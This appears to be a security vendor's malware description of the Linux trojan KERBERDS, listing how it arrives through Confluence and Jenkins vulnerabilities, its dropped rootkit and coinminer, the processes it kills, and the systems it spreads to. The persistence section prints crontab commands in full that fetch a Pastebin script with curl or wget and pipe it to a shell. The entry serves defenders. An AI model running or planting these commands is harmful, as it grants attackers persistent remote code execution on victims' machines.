Trojan.Linux.KERBERDS.UWEJH

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

This malware arrives via the following means:

• Taking advantage of the vulnerability of CVE-2019-3396 Confluence Widget Connector

Installation

This Trojan drops the following copies of itself into the affected system:

• /usr/bin/kerberods ← It uses LSD packed its drop copies
• /usr/sbin/kerberods ← It uses LSD packed its drop copies
• /tmp/kerberods ← It uses LSD packed its drop copies

It drops the following files:

• /usr/local/lib/{random character}.c ← (source code of rootkit)
• /usr/local/lib/{random character}.so ← (compiled executable of the source code) - detected as Rootkit.Linux.KERBERDS.A
• /tmp/khugepageds ← detected as Coinminer.Linux.MALXMR.UWEJI

It adds the following processes:

• /tmp/khugepageds
• /usr/local/lib/{random character}.so

Other System Modifications

This Trojan modifies the following file(s):

• /etc/hosts

It deletes the following files:

• /etc/ld.so.preload
• /usr/local/lib/{random character}.c

Process Termination

This Trojan terminates the following processes if found running in the affected system's memory:

• hwlh3wlh44lh
• Circle_MI
• get.bi-chi.com
• hashvault.pro
• nanopool.org
• /usr/bin/.sshd
• /usr/bin/bsd-port
• xmr
• xig
• ddgs
• qW3xT
• wnTKYg
• t00ls.ru
• sustes
• thisxxs
• hashfish
• kworkerds
• /tmp/devtool
• systemctI
• plfsbce
• luyybce
• 6Tx3Wq
• dblaunchs
• /boot/vmlinuz
• Processes that use the following IP address:
  • {BLOCKED}.{BLOCKED}.106.27
  • {BLOCKED}.{BLOCKED}.210.206

Other Details

This Trojan connects to the following URL(s) to get the affected system's IP address:

• https://ident.me

It does the following:

• Installs GCC in the system to compile the source code of the rootkit, then execute it.
• It creates the following services to enable automatic execution of itself:
  • /etc/init.d/netdns
  • /usr/lib/systemd/system/netdns.service
• Execute the following to create crontabs to enable automatic execution of a shell script found in pastebin every 10 minutes:
  • echo\"*/10 * * * * (curl -fsSL https://pastebin.com/raw/{string from pastebin}||wget -q -O- https://pastebin.com/raw/{string from pastebin})|sh" | crontab -
• Creates the following crontabs to enable automatic execution of a shell script found in pastebin every 10 minutes:
  • Path: /etc/cron.d/root
  • Content: */10 * * * * root (curl -fsSL https://pastebin.com/raw/{string from pastebin}||wget -q -O- https://pastebin.com/raw/{string from pastebin})|sh
• Creates the following crontabs to enable automatic execution of a shell script found in pastebin every 15 minutes:
  • Paths:
    • /var/spool/cron/root
    • /var/spool/cron/crontabs/root
  • Content: */15 * * * * (curl -fsSL https://pastebin.com/raw/{string from pastebin}||wget -q -O- https://pastebin.com/raw/{string from pastebin})|sh
• It tries to access Redis servers in order to compromise it.
• It may spread to other devices:
  • By taking advantage of the following vulnerabilities:
    • CVE-2019-1003000
    • CVE-2019-1003001
  • over SSH network
• It connects to the following URLs:
  • https://pastebin.com/raw/{BLOCKED}id ← (shell script to be downloaded and executed in vulnerable devices)
  • https://pastebin.com/raw/{BLOCKED}pu ← (shell script to connect to another pastebin URL)
  • https://pastebin.com/raw/{BLOCKED}6H ← (checks for update)
  • https://pastebin.com/raw/{BLOCKED}iE
  • https://pastebin.com/raw/{BLOCKED}Jh